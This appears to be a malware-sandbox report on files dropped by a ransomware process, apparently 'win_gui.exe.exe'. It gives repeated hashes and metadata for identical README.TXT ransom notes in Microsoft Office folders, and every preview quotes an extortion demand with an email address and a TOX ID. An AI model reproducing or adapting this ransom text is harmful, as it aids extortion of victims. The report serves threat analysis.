                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\PROOF\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\PUBBA\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\PUBWIZ\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\PersonaSpy\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\QUERIES\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\SAMPLES\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\STARTUP\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\TextInputIntelligence\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\XLSTART\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\msipc\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\osfFPA\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000018\assets\_cardview\lib\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000018\assets\_cardview\lib\native-common\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000018\assets\src\assets\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000050\dist\en-us_web\assets\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\assets\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
